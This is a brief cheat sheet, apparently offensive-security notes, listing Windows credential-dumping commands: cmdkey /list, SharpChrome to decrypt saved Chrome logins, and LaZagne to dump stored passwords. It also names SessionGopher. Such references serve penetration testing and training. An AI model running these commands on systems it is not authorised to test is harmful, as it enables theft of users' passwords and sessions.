Credential Dumping & Enumeration

  1. List saved credentials on Windows

    cmdkey /list
  2. Retrieve saved Chrome credentials using SharpChrome

    .\SharpChrome.exe logins /unprotect
  3. View LaZagne help menu

    .\lazagne.exe -h
  4. Run all LaZagne modules

    .\lazagne.exe all
  5. Run SessionGopher to extract session information

Last updated